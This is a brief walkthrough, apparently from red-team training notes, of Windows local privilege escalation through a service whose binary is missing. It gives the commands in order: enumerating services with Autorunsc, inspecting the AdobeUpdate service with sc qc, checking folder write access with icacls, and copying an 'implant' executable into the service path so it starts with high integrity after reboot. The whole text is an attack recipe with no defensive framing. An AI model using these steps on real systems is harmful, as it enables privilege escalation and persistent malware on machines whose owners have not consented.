First: Let’s try to find missing services

Autorunsc64.exe -a s | more

Second: Take a look at the service configuration

sc qc AdobeUpdate

Please Notice that that service should use this binary however that binary is not their

Third: Let’s check if we have write access to that folder

icacls C:\\RTO\\bin

And we got modified access

Fourth: Copy our malicious service to that path

copy C:\\Users\\IEUser\\Desktop\\LPE\\implant\\implantsrv.exe C:\\RTO\\bin\\AdobeUpdate.exe

Now on the reboot, the service will start with high-integrity access